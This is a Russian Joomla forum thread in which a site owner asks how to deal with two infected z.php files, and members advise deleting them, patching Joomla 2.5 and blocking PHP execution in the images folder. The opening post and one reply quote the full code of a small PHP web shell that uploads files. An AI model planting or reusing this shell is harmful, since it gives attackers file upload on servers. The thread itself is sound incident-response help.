Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 39 Ответов
  • 1690 Просмотров
*

doro45

  • Захожу иногда
  • 106
  • 0 / 0
Зараженные файлы
« : 26.12.2017, 09:21:58 »
Пришло сообщение с хостинга о двух зараженных файлах
mamadom.com.ua/www/images/z.php
mamadom.com.ua/www/z.php
<?php if(isset($_GET["ndmbc"])){echo"[uname]".php_uname()."[/uname]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@Copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?>
<title>Hacked by d3b~X</title>
<?php if(isset($_GET["ndmbc"])){echo"[uname]".php_uname()."[/uname]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@Copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?>
<title>Hacked by d3b~X</title>
В файлах хостинг выделил красным зараженные строки.
Файлы удалять полностью или только строчки? Я не помню уже, что это за файлы , и можно ли их удалять.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Зараженные файлы
« Ответ #1 : 26.12.2017, 09:25:05 »
Эти файлы удаляйте полностью и лечите сайт, ищите причину их возникновения.
*

yuri-it

  • Давно я тут
  • 994
  • 44 / 3
  • Быстрый хостинг https://jehost.ru
Re: Зараженные файлы
« Ответ #2 : 26.12.2017, 09:25:48 »
Пришло сообщение с хостинга о двух зараженных файлах
mamadom.com.ua/www/images/z.php
mamadom.com.ua/www/z.php
<?php if(isset($_GET["ndmbc"])){echo"[uname]".php_uname()."[/uname]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@Copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?>
<title>Hacked by d3b~X</title>
<?php if(isset($_GET["ndmbc"])){echo"[uname]".php_uname()."[/uname]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@Copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?>
<title>Hacked by d3b~X</title>
В файлах хостинг выделил красным зараженные строки.
Файлы удалять полностью или только строчки? Я не помню уже, что это за файлы , и можно ли их удалять.
Код может быть встроен в существующие файлы, так и в виде отдельных. В данном случае полагаю, что это отдельные файлы и их надо полностью удалить и затем озаботиться поиском уязвимости.
По-настоящему быстрый хостинг для Joomla : https://jehost.ru
Отзывы: http://joomlaforum.ru/index.php/topic,109288.0.html
Отзывы по хостингу http://hosting101.ru/jehost.ru
*

doro45

  • Захожу иногда
  • 106
  • 0 / 0
Re: Зараженные файлы
« Ответ #3 : 26.12.2017, 09:29:39 »
я так понимаю, что заражение было в 2014 году?
Дата последней модификации   Источник заражения
/mamadom.com.ua/www/images/z.php   Показать   05.02.2014 13:03:53   
Не определен
/mamadom.com.ua/www/z.php   Показать   05.02.2014 13:03:52   
Не определен
*

doro45

  • Захожу иногда
  • 106
  • 0 / 0
Re: Зараженные файлы
« Ответ #4 : 26.12.2017, 09:31:00 »
Эти файлы удаляйте полностью и лечите сайт, ищите причину их возникновения.
а сайт не сломается после удаления этих файлов?
*

doro45

  • Захожу иногда
  • 106
  • 0 / 0
Re: Зараженные файлы
« Ответ #5 : 26.12.2017, 09:40:32 »
В админке другого сайта высветилось такое Joomla!Failed to connect to http://www.rsjoomla.com port 80: Connection refused , до этого, вместо этого сообщения было сообщение об обновлении Joomla. Это может быть как то связано? Хостинг один и тот же.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Зараженные файлы
« Ответ #6 : 26.12.2017, 09:46:20 »
В папке /images не должно быть файлов .php . Удаляйте все файлы типа z.php
*

doro45

  • Захожу иногда
  • 106
  • 0 / 0
Re: Зараженные файлы
« Ответ #7 : 26.12.2017, 09:59:20 »
В папке /images не должно быть файлов .php . Удаляйте все файлы типа z.php
Спасибо. Удалил оба файла z.php , сайт работает.
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Зараженные файлы
« Ответ #8 : 26.12.2017, 10:12:05 »
Удалил оба файла z.php , сайт работает.
только еще раз обратите внимание, что это не решило проблему на будущее. вы удалили результат заражения, но причина осталась. теперь ее надо найти и устранить.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

yuri-it

  • Давно я тут
  • 994
  • 44 / 3
  • Быстрый хостинг https://jehost.ru
Re: Зараженные файлы
« Ответ #9 : 26.12.2017, 10:14:30 »
я так понимаю, что заражение было в 2014 году?
Дата последней модификации   Источник заражения
/mamadom.com.ua/www/images/z.php   Показать   05.02.2014 13:03:53   
Не определен
/mamadom.com.ua/www/z.php   Показать   05.02.2014 13:03:52   
Не определен
Обычно вирусы дату изменения специально выставляют не актуальную.
По-настоящему быстрый хостинг для Joomla : https://jehost.ru
Отзывы: http://joomlaforum.ru/index.php/topic,109288.0.html
Отзывы по хостингу http://hosting101.ru/jehost.ru
*

yuri-it

  • Давно я тут
  • 994
  • 44 / 3
  • Быстрый хостинг https://jehost.ru
Re: Зараженные файлы
« Ответ #10 : 26.12.2017, 10:16:28 »
Автору рекомендую добавить в конфиг Nginx, чтобы запретить выполнение PHP скриптов:

   
Код
location ~* /(images|media|logs)/.*\.(php|pl|py|jsp|asp|sh|cgi)$ {
      return 403;
    }
По-настоящему быстрый хостинг для Joomla : https://jehost.ru
Отзывы: http://joomlaforum.ru/index.php/topic,109288.0.html
Отзывы по хостингу http://hosting101.ru/jehost.ru
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Зараженные файлы
« Ответ #11 : 26.12.2017, 10:22:29 »
рекомендую добавить в конфиг Nginx

Шаред наверняка.

А какая версия Joomla? Сколько сайтов на аккаунте хостинга?
*

yuri-it

  • Давно я тут
  • 994
  • 44 / 3
  • Быстрый хостинг https://jehost.ru
Re: Зараженные файлы
« Ответ #12 : 26.12.2017, 10:24:23 »
Шаред наверняка.

А какая версия Joomla? Сколько сайтов на аккаунте хостинга?

У нормального шареда такой конфиг уже должен быть по умолчанию.
По-настоящему быстрый хостинг для Joomla : https://jehost.ru
Отзывы: http://joomlaforum.ru/index.php/topic,109288.0.html
Отзывы по хостингу http://hosting101.ru/jehost.ru
*

doro45

  • Захожу иногда
  • 106
  • 0 / 0
Re: Зараженные файлы
« Ответ #13 : 26.12.2017, 10:25:48 »
конфиг Nginx
а где это находится?
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Зараженные файлы
« Ответ #14 : 26.12.2017, 10:26:39 »
ТС, вам проще в комм раздел обратиться.
Ну вычистили 2, а остальные 100?
А дырки закрыть?
*

doro45

  • Захожу иногда
  • 106
  • 0 / 0
Re: Зараженные файлы
« Ответ #15 : 26.12.2017, 10:27:27 »
Шаред наверняка.

А какая версия Joomla? Сколько сайтов на аккаунте хостинга?

Joomla 2.5. у меня 4  сайта на хостинге.
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Зараженные файлы
« Ответ #16 : 26.12.2017, 10:29:06 »
Joomla 2.5

2.5 сколько? Там минимум еще 2 патча должны быть. 100% сайты не изолированы от друг друга и все расползлось уже.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Re: Зараженные файлы
« Ответ #17 : 26.12.2017, 10:33:31 »
на виртуальном хостинге в папку с картинками ложим файл .htaccess
Код
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
Но если во вложенных папках будет чужой .htaccess, этот не будет работать.
*

doro45

  • Захожу иногда
  • 106
  • 0 / 0
Re: Зараженные файлы
« Ответ #18 : 26.12.2017, 10:37:24 »
2.5 сколько? Там минимум еще 2 патча должны быть. 100% сайты не изолированы от друг друга и все расползлось уже.

на 2.5 только один этот сайт.Другие на 3. и на друпале
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Зараженные файлы
« Ответ #19 : 26.12.2017, 10:40:07 »
на 2.5 только один этот сайт.Другие на 3. и на друпале
а это уже все равно скорее всего...
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

wishlight

  • Живу я здесь
  • 4981
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Re: Зараженные файлы
« Ответ #20 : 26.12.2017, 10:41:20 »
на 2.5 только один этот сайт.

Ну тогда советую его отделить от других пока все лечить не пришлось. Ну и минимум обновить его до 2.5.28 и поставить патч на сессии https://github.com/joomla/joomla-cms/releases/download/3.4.7/SessionHardening25v1.zip и лечить или мигрировать. С 2 патчами я ошибся кажется. Это для 1.5.26 2 надо. Хотя уже может поздно.
*

doro45

  • Захожу иногда
  • 106
  • 0 / 0
Re: Зараженные файлы
« Ответ #21 : 26.12.2017, 10:46:01 »
Ну тогда советую его отделить от других пока все лечить не пришлось. Ну и минимум обновить его до 2.5.28 и поставить патч на сессии https://github.com/joomla/joomla-cms/releases/download/3.4.7/SessionHardening25v1.zip и лечить или мигрировать. С 2 патчами я ошибся кажется. Это для Joomla 1.5.26 2 надо. Хотя уже может поздно.

если сайт обновить выше 2.5, то он перестаёт работать.там какие то модули, или плагины заточены только под 2.5
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Зараженные файлы
« Ответ #22 : 26.12.2017, 10:47:42 »
так патч не повысит версию до 3-й, он просто закроет уязвимость
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Зараженные файлы
« Ответ #23 : 26.12.2017, 10:47:57 »
если сайт обновить выше 2.5, то он перестаёт работать.там какие то модули, или плагины заточены только под 2.5

А кто сказал обновлять выше?
2.5.28 +патчи.
Но 99% что уже поздно
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Зараженные файлы
« Ответ #24 : 26.12.2017, 10:51:07 »
Но 99% что уже поздно
ну там же на самом деле еще версия php важна. так что может там даже не в этом дело...
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Зараженные файлы
« Ответ #25 : 26.12.2017, 10:53:05 »
ну там же на самом деле еще версия php важна. так что может там даже не в этом дело...
Так залито же пару шеллов.
Ограничились парой? Такое не встречается
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Зараженные файлы
« Ответ #26 : 26.12.2017, 10:53:58 »
не, я имею в виду, что причина может быть не в отсутствии патчей. может быть шаблон, какое то расширение, и т.п.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Зараженные файлы
« Ответ #27 : 26.12.2017, 10:56:33 »
не, я имею в виду, что причина может быть не в отсутствии патчей. может быть шаблон, какое то расширение, и т.п.
Это конечно, запросто
*

doro45

  • Захожу иногда
  • 106
  • 0 / 0
Re: Зараженные файлы
« Ответ #28 : 26.12.2017, 10:57:56 »
ну там же на самом деле еще версия php важна. так что может там даже не в этом дело...
Версия PHP: 7.0.24
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Re: Зараженные файлы
« Ответ #29 : 26.12.2017, 10:58:40 »
быть того не может. Joomla 2.5 на 7-ке не работает
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Заражены файлы картинок движка Joomla 3

Автор krog

Ответов: 5
Просмотров: 1289
Последний ответ 16.04.2021, 08:16:45
от Taatshi
PHP в режиме FastCGI и права на файлы

Автор cntrl

Ответов: 12
Просмотров: 1197
Последний ответ 08.09.2020, 13:45:10
от Septdir
Хостинг оповестил что некоторые файлы вашего хостинга были изменены

Автор Элана

Ответов: 9
Просмотров: 944
Последний ответ 15.01.2019, 18:54:28
от voland
Удалены файлы с сайта 1.error.php и 1.joomla_update.php

Автор Элана

Ответов: 18
Просмотров: 1937
Последний ответ 04.12.2018, 23:55:37
от winstrool
Можно ли защитить сайт от инъекций в файлы без обновления Joomla и расширений?

Автор borro

Ответов: 6
Просмотров: 1830
Последний ответ 09.11.2018, 18:36:44
от winstrool